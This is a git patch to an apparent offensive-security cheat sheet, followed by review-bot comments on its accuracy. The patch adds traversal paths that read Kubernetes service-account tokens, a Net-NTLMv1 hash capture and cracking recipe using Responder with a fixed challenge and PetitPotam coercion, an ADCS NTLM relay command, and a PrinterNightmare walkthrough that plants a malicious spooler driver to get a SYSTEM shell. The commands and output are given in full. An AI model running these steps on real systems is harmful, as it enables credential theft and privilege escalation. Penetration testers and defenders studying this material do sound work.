From c8076e99c979cca0496d9585169d24787d051618 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 6 Sep 2021 20:58:44 +0200 Subject: [PATCH] Net-NTLMv1 + DriverPrinter --- Directory Traversal/README.md | 3 ++ .../Active Directory Attack.md | 43 +++++++++++++++++-- .../Windows - Privilege Escalation.md | 26 ++++++++++- 3 files changed, 67 insertions(+), 5 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index f6ef98f..e459021 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -125,6 +125,9 @@ To bypass this behaviour just add forward slashes in front of the url: /proc/self/cwd/main.py /home/$USER/.bash_history /home/$USER/.ssh/id_rsa +/run/secrets/kubernetes.io/serviceaccount/token +/run/secrets/kubernetes.io/serviceaccount/namespace +/run/secrets/kubernetes.io/serviceaccount/certificate /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b3e3f24..518be96 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -58,7 +58,8 @@ - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) + - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) + - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) 
@@ -1665,7 +1666,39 @@ klist .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` -### Capturing and cracking NTLMv2 hashes + + +### Capturing and cracking Net-NTLMv1/NTLMv1 hashes + +> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash. + +:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine, to get the machine account Net-NTLM v1 hash + +Requirements: +* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) + + +* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge + ```ps1 + HTTPS = On + DNS = On + LDAP = On + ... + ; Custom challenge. + ; Use "Random" for generating a random challenge for each requests (Default) + Challenge = 1122334455667788 + ``` +* Fire Responder: `responder -I eth0 --lm` +* If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John + ```ps1 + username::hostname:response:response:challenge -> NTHASH:response + NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 + ``` + +:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used. + + +### Capturing and cracking Net-NTLMv2/NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. 
@@ -1680,6 +1713,7 @@ PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y ``` + ### Man-in-the-Middle attacks & relaying NTLMv1 and NTLMv2 can be relayed to connect to another machine. @@ -1921,8 +1955,9 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 * Version 1: NTLM Relay + Rubeus + PetitPotam ```powershell impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation - # Templates: workstation, DomainController, Machine; KerberosAuthentication + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate + # For a member server or workstation, the template would be "Computer". + # Other templates: workstation, DomainController, Machine, KerberosAuthentication # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 569cff1..52057a2 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -35,7 +35,7 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) -* [EoP - Printers](#eop-printers) +* [EoP - Printers](#eop---printers) * [Universal Printer](#universal-printer) * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) * [EoP - Runas](#eop---runas) 
@@ -999,6 +999,30 @@ Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue Add-Printer -ConnectionName $fullprinterName ``` +### PrinterNightmare + +```ps1 +git clone https://github.com/Flangvik/DeployPrinterNightmare +PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell +[<3] @Flangvik - TrustedSec +[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Adding printer driver => Generic / Text Only! +[+] Adding printer => EasySystemShell! +[+] Setting 64-bit Registry key +[+] Setting 32-bit Registry key +[+] Setting '*' Registry key +``` + +```ps1 +PS C:\target> $serverName = 'printer-installed-host' +PS C:\target> $printerName = 'EasySystemShell' +PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue +PS C:\target> Add-Printer -ConnectionName $fullprinterName +``` + ### Bring Your Own Vulnerability Concealed Position : https://github.com/jacob-baines/concealed_position
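Review bot: the third added path in the `Directory Traversal/README.md` hunk, `/run/secrets/kubernetes.io/serviceaccount/certificate`, names a file the default service-account mount does not contain; the projected volume holds `token`, `namespace` and the CA bundle `ca.crt`, so that entry should read `.../ca.crt`. Also, `/run` and `/var/run` are the same directory on systemd-based distributions, so the three new lines duplicate the existing `/var/run/secrets/kubernetes.io/serviceaccount` entry under a second prefix; if the intent is to cover both prefixes because some path filters treat them differently, say so in a short comment so the list does not read as an inconsistency.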
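Review bot: renaming the heading in the TOC hunk of `Active Directory Attack.md` drops the `#capturing-and-cracking-ntlmv2-hashes` anchor that external links and bookmarks may already point at; GitHub derives anchors only from heading text and offers no aliases, so either keep the old heading text for the NTLMv2 section (only the new NTLMv1 entry needs a new anchor) or accept the break and mention it in the commit message. The new slugs themselves are correct: the `/` in `Net-NTLMv1/NTLMv1` is dropped, giving `net-ntlmv1ntlmv1`.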
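Review bot: the `Requirements` bullet in the `@@ -1665` hunk misdescribes `LmCompatibilityLevel`. Per Microsoft's documentation level 0 is "Send LM & NTLM responses" and level 1 is "Send LM & NTLM - use NTLMv2 session security if negotiated" (the NTLMv1-with-SSP case the later `:warning:` line calls "not quite ideal"), while level 2 still sends an NTLM (v1) response; only 3 and above send NTLMv2 exclusively. State the condition as "LmCompatibilityLevel below 3" and add the hardening counterpart a reader will look for: raising it to 5 (refuse LM and NTLM) removes the precondition, and the coercion side is covered by the Print Spooler and PetitPotam mitigations. Smaller fixes in the same hunk: the blockquote opens a parenthesis it never closes (`(they are derived from a challenge/response algorithm and are based on the user's NT hash.`); the `:information_source:` line has a stray comma before `to get`; both fenced blocks are tagged `ps1` but contain a Responder.conf INI fragment and a hash-format description, so `ini` and `text` fit better; `SSP(Security Support Provider)` needs a space; and `you need to format then submit them` should spell out what the arrow in the following block means, namely that the `username::hostname:response:response:challenge` line Responder writes is reduced to `NTHASH:response` before submission.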
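Review bot: in the `@@ -1921` hunk the new value `--template VulnTemplate` reads like a literal template name but is a placeholder, and the comment beneath it is internally inconsistent: `Computer` is the display name of the built-in template whose actual name (the value `--template` expects) is `Machine`, and likewise `Workstation` is the template name behind the display name "Workstation Authentication", so listing both `Computer` and `Machine` as different options is misleading. Mark the placeholder as one (e.g. `--template <TemplateName>`) and reword the two comment lines to say that the built-in templates are `Machine` (displayed as "Computer"), `DomainController`, `Workstation` and `KerberosAuthentication`, referenced by template name rather than display name. The unchanged first example line `-t http:///certsrv/certfnsh.asp` still has an empty host between the slashes and deserves a `<CA-host>` placeholder while this block is being edited.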
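Review bot: the second fenced block in the `@@ -999` hunk (`$serverName` through `Add-Printer -ConnectionName $fullprinterName`) repeats line for line the client-side snippet that closes the Universal Printer section just above it, visible as the hunk's leading context lines `Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue` and `Add-Printer -ConnectionName $fullprinterName`; either refer back to that snippet or state what differs here (only the host and printer name). The new section also has no prose at all: a sentence saying what DeployPrinterNightmare stages on the `C:\adversary` host (its own output lines `Adding printer driver` and `Adding printer` show a shared driver and printer), what the two `mimispool.dll` arguments are, and which Point and Print setting on the target allows a non-administrator's `Add-Printer -ConnectionName` to install that shared driver would make it readable, and defenders will want the matching hardening reference, the `RestrictDriverInstallationToAdministrators` Point and Print policy value Microsoft documented with the PrintNightmare fixes. Style: the first block is tagged `ps1` but mixes a `git clone` line with no prompt, a `PS C:\adversary>` prompt and raw tool output; split the clone command from the session capture or use one consistent prompt.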